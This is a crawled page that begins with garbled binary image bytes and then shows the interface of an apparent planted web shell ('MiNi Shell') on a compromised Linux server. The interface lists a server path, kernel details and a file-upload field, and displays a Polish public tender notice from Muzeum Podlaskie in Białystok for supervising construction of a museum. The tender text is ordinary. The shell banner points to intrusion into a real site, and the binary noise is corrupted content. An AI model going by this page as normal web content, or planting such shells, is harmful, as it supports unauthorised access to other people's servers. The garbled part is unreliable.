JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/0023661401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inspektora Nadzoru inwestycji pn. Budowa Muzeum Błogosławionego Księdza Jerzego Popiełuszki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM PODLASKIE W BIAŁYMSTOKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276328</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Kościuszki 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-426</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857407737</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muzeum.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumpodlaskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inspektora Nadzoru inwestycji pn. Budowa Muzeum Błogosławionego Księdza Jerzego Popiełuszki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82d0c9ce-3541-4d11-8b7f-79dda1af80e2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00236614</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00091825/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Pełnienie funkcji Inspektora Nadzoru inwestycji pn. Budowa Muzeum Błogosławionego Księdza Jerzego Popiełuszki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> FENX.07.01 Infrastruktura kultury i turystyki kulturowej priorytet FENX.07 Kultura Programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027 (FEnIKS). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-82d0c9ce-3541-4d11-8b7f-79dda1af80e2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-82d0c9ce-3541-4d11-8b7f-79dda1af80e2<br/>11.16.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@muzeum.bialystok.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.14.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa § 12 Regulamin Platformy e-Zamówienia, a mianowicie:<br/>11.14.1.	W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>a)	Komputer PC: <br/>	parametry minimum: Intel Core2 Duo, 2 GB RAM, HD,<br/>	zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04,<br/>	zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge 14.0 i nowsze,<br/>albo<br/>b)	Tablet/Telefon:<br/>	parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3,<br/>	przeglądarka Chrome 61 lub nowsza<br/>11.14.2.	Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, <br/>obsługi Java Script oraz cookies;<br/>11.14.3.	Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania <br/>i oznaczania czasu odbioru danych:<br/>a)	specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b)	format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c)	oznaczenia czasu odbioru danych: wszelkie operacje opierają się <br/>o czas serwera i dane zapisywane są z dokładnością co do sekundy.<br/>13.2.	Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 1557 ze zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozp. PE i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozp. o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.), dalej „RODO”, Zamawiający informuje, że: 1.Administratorem danych osobowych Wykonawcy jest Muzeum Podlaskie w Białymstoku Rynek Kościuszki 10, 15-426 Białystok, tel. 85 740-77-31, e-mail – muzeum@muzeum.bialystok.pl; 2.w sprawach związanych z danymi osob. Wykonawcy proszę kontaktować się z IOD, w następujący sposób: telefonicznie – 535521800, poprzez e-mail – iod@muzeum.bialystok, listownie na adres Muzeum Podlaskie w Białymstoku, ul. Rynek Kościuszki 10, 15-426 Białystok 3.dane osobowe Wykonawcy przetwarzane będą na podst.art.6 ust.1 lit.c RODO w celu prowadzenia przedmiotowego postęp. o udzielenie zam. publ. oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zam. publ. oraz jej realizacji, a także udokumentowania postęp. o udzielenie zam. publicznego i jego archiwizacji; 4.odbiorcami danych osob. Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dok. postęp. w oparciu o art. 18 oraz art. 74 ust. z 11.09.2019 r. Pzp (Dz. U.2024 r. poz. 1320), zwana dalej „ustawą Pzp”; 5.dane osobowe Wykonawcy będą przechowywane, zg. z art. 78 ust. 1 ust. Pzp, przez okres 4 lat od dnia zakończenia postęp. o udzielenie zam., w sposób gwarantujący jego nienaruszalność. Okres przechowywania liczony jest od 1 stycznia roku następnego od daty zakończenia sprawy; 6. obowiązek podania przez Wykonawcę danych osob. bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przep. ustawy Pzp, związanym z udziałem w postęp. o udzielenie zam. publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7.w odniesieniu do danych osob. Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; 1.Wykonawca posiada: na podst. art. 15 RODO prawo dostępu do danych osob. dotyczących Wykonawcy; na podst. art. 16 RODO prawo do sprostowania danych osob., o ile ich zmiana nie skutkuje zmianą wyniku postęp. o udzielenie zam. publ. ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników; na podst. art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osob. z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osob. narusza przepisy RODO; 2.Wykonawcy nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osob.; prawo do przenoszenia danych osob., o którym mowa w art. 20 RODO; na podst. art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osob., gdyż podstawą prawną przetwarzania danych osob. Wykonawcy jest art. 6 ust. 1 lit. c RODO. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozp. 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zam. może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postęp. o udzielenie zam. publicznego lub konkursu. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osob., o którym mowa w art. 16 rozp.2016/679, nie może skutkować zmianą wyniku postęp. o udzielenie zam. publ. lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozp.2016/679, nie ogranicza przetwarzania danych osob. do czasu zakończenia postęp. o udzielenie zam. publ. lub konkursu. W przypadku danych osob. zamieszczonych przez Zamawiającego w BZP, prawa, o których mowa w art. 15 i art. 16 rozp.2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MBG.261.2.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach zadania przewidziano nadzór inwestorski. Nadzór osób uprawnionych jest niezbędny w celu prawidłowej i terminowej realizacji prac budowlanych. Ponadto, osoby te będą<br/>odpowiedzialne za weryfikację zgodności procesu budowlanego z przepisami prawa budowlanego oraz będą monitorowały postęp prac, sprawnie podejmując odpowiednie decyzje w Projekcie. Do zadań szczególnych inspektora będą należeć w szczególności:<br/>- Udział w przygotowaniu umów z wykonawcami robót budowlanych<br/>- Dokonywanie zgłoszeń o rozpoczęciu budowy.<br/>- Uczestniczenie w procedurze przekazania placu budowy.<br/>- Sprawowanie nadzoru inwestorskiego nad wszystkimi robotami realizowanymi w ramach Projektu, zgodnie z obowiązującymi w tym zakresie przepisami, w szczególności z Prawem Budowlanym;<br/>- Kontrola zgodności prowadzonych prac z: dokumentacją projektową, specyfikacją techniczną, umową, harmonogramem robót, założonymi wskaźnikami rzeczowymi, <br/>- Bieżąca współpraca z wykonawcą robót, udzielanie wykonawcom wsparcia przy pozyskiwaniu niezbędnych dokumentów, decyzji administracyjnych, zezwoleń.<br/>- Sprawdzanie jakości dokumentów: zezwoleń, deklaracji zgodności, aprobat technicznych, certyfikatów, atestów itd.<br/>- Monitorowanie postępu robót poprzez sprawdzanie rzeczywistego zaawansowania i zgodności z harmonogramem i zdefiniowanymi wskaźnikami.<br/>- Udział w weryfikacji raportów dot. postępu robót oraz dokumentów rozliczeniowych, przedkładanych przez wykonawców robót, w zakresie rzeczowym i technicznym.<br/>- Udział w naradach koordynacyjnych z wykonawcą robót budowlanych.<br/>- Udział w odbiorach robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych.<br/>- Weryfikowanie robót dodatkowych, zamiennych i uzupełniających proponowanych przez wykonawców, w zakresie rzeczowym i finansowym oraz udział w przygotowaniu stosownych protokołów (jeżeli wystąpią).<br/>- Współudział w przygotowywaniu dokumentów w przypadku konieczności zmian wprowadzanych Aneksami do Umowy;<br/>- Weryfikowanie dokumentacji powykonawczej sporządzonej przez wykonawcę.<br/>- Udział w odbiorach technicznych, rozruchach, odbiorze końcowym, sporządzenie protokołu odbioru końcowego.<br/>- Sprawdzenie i potwierdzenie gotowości obiektu do dokonania przez Zamawiającego komisyjnego odbioru pogwarancyjnego wraz z przygotowaniem wszelkich niezbędnych dokumentów – przeglądy gwarancyjne i pogwarancyjne po odbiorze końcowym Zamawiający zapewni we własnym zakresie (finansowanie ze środków własnych).<br/>4.2.	W ramach niniejszego zamówienia nadzór inwestorski obejmuje branże: 	konstrukcyjno - budowlaną, 	sanitarną, 	elektryczną, 	teletechniczną,	drogową.4.3.	Do podstawowych obowiązków Wykonawcy należy zapewnienie wykonywania funkcji inspektora nadzoru inwestorskiego wykonujących wszystkie czynności przewidziane dla inspektora nadzoru na mocy przepisów ustawy z dnia 7 lipca 1994 roku - prawo budowlane.<br/>4.4.	Przedmiot zamówienia, o którym mowa w pkt. 4.1 SWZ został szczegółowo określony w Załączniku Nr 1 do SWZ – Opis przedmiotu zamówienia.<br/>Dokumentacja projektowa Dla zadania: „„Budowa Muzeum Błogosławionego Księdza Jerzego Popiełuszki” zamieszczona pod linkiem: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-02e0dd6b-f53c-43d6-a9c7-6566c55c5223<br/>4.7.	Wykonawca udziela gwarancji jakości na wykonaną usługę w wymiarze 60 miesięcy od dnia odbioru końcowego robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71631300-3 - Usługi technicznego nadzoru budowlanego</p> <p class="mb-0">72220000-3 - Usługi doradcze w zakresie systemów i doradztwo techniczne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4.	zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1) Wykonawca musi spełnić warunek doświadczenia tj. wykazać należyte wykonanie (a w przypadku świadczeń powtarzających się lub ciągłych wykonywanie) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, która: <br/>a)	dotyczyła nadzoru inwestorskiego robót budowlanych o wartości robót minimum 45 000 000,00 zł brutto (słownie: czterdzieści pięć milionów złotych 00/100),<br/>b)	obejmowała nadzór w branżach konstrukcyjno-budowlanej, elektrycznej i niskoprądowej, sanitarnej i drogowej. <br/>2) Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji:<br/>a)	co najmniej jedną osobę, która będzie pełniła funkcję inspektora nadzoru inwestorskiego w branży konstrukcyjno – budowlanej i jednocześnie funkcję Koordynatora Zespołu; <br/>- która w okresie ostatnich 5 lat przed terminem składania ofert pełniła minimum jednokrotnie funkcję inspektora nadzoru w rozumieniu art. 25 ustawy Prawo budowlane w specjalności konstrukcyjno-budowlanej nad realizacją budowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej netto minimum 1.500,- m² i o wartości robót minimum 45 000 000,00 zł brutto (słownie: czterdzieści pięć milionów złotych 00/100): <br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń w zakresie umożliwiającym nadzorowanie robót objętych przedmiotem zamówienia<br/>b)	co najmniej jedną osobę, pełniącą funkcję inspektora nadzoru inwestorskiego w branży sanitarnej; <br/>- która w okresie ostatnich 5 lat przed terminem składania ofert pełniła minimum jednokrotnie funkcję inspektora nadzoru w rozumieniu art. 25 ustawy Prawo budowlane przy robotach branży sanitarnej nad realizacją budowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej netto minimum 1.500,- m²: <br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń w zakresie umożliwiającym nadzorowanie robót objętych przedmiotem zamówienia<br/>c)	co najmniej jedną osobę, pełniącą funkcje inspektora nadzoru inwestorskiego w branży elektrycznej: <br/>- która w okresie ostatnich 5 lat przed terminem składania ofert pełniła minimum jednokrotnie funkcję inspektora nadzoru w rozumieniu art. 25 ustawy Prawo budowlane w branży elektrycznej nad realizacją budowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej netto minimum 1.500,- m²;<br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w zakresie umożliwiającym nadzorowanie robót objętych przedmiotem zamówienia<br/>d)	co najmniej jedną osobę pełniącą funkcję inspektora nadzoru inwestorskiego w branży telekomunikacyjnej; <br/>- która w okresie ostatnich 5 lat przed terminem składania ofert pełniła minimum jednokrotnie funkcję inspektora nadzoru w rozumieniu art. 25 ustawy Prawo budowlane w branży telekomunikacyjnej nad realizacją budowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej netto minimum 1.500,- m²;<br/>- posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń w zakresie umożliwiającym nadzorowanie robót objętych przedmiotem zamówienia<br/>e)	co najmniej jedną osobę pełniącą funkcję inspektora nadzoru inwestorskiego w branży drogowej: <br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej w zakresie umożliwiającym nadzorowanie robót objętych przedmiotem zamówienia<br/><br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW <br/>UDZIAŁU W POSTĘPOWANIU:1)	Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień publikacji ogłoszenia<br/>2)	Zgodnie art. 3 pkt 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez budowę rozumie się wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego.<br/>3)	Zgodnie z art. 3 pkt 7a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez przebudowę rozumie się wykonywanie robót budowlanych, w wyniku których następuje zmiana parametrów użytkowych lub technicznych istniejącego obiektu budowlanego, z wyjątkiem charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość, długość, szerokość bądź liczba kondygnacji; w przypadku dróg są dopuszczalne zmiany charakterystycznych parametrów w zakresie niewymagającym zmiany granic pasa drogowego. <br/>4)	Przez uprawnienia bez ograniczeń 